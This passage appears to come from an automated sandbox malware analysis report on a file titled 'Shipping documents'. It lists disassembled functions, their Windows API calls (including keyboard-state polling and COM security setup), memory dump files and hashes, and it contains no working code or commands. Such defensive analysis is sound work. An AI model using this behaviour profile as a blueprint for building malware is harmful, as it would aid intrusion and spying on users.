                                                                                                          • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                          • IsWindow.USER32(00000000), ref: 00443C3A
                                                                                                          • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                          • String ID: BUTTON
                                                                                                          • API String ID: 1834419854-3405671355
                                                                                                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                          Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                          • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • _wprintf.LIBCMT ref: 00454074
                                                                                                          • __swprintf.LIBCMT ref: 004540A3
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                          • API String ID: 455036304-4153970271
                                                                                                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                          Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                          • _memmove.LIBCMT ref: 00467EB8
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                          • _memmove.LIBCMT ref: 00467F6C
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2170234536-0
                                                                                                          • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                          • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                          Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                          • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                          • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                          • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                          • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                          Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3096461208-0
                                                                                                          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                          Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                          • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                          • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3218148540-0
                                                                                                          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                          Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 136442275-0
                                                                                                          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                          Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcsncpy.LIBCMT ref: 00467490
                                                                                                          • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • _wcstok.LIBCMT ref: 004674FF
                                                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                          • String ID: X
                                                                                                          • API String ID: 3104067586-3081909835
                                                                                                          • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                                                          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                          • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                                                          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                          Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                          • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                          • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                          Strings
                                                                                                          • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                          • String ID: NULL Pointer assignment
                                                                                                          • API String ID: 440038798-2785691316
                                                                                                          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                          Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                          • _wcslen.LIBCMT ref: 004610A3
                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                          • String ID: ThumbnailClass
                                                                                                          • API String ID: 4136854206-1241985126
                                                                                                          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                          Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                          • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
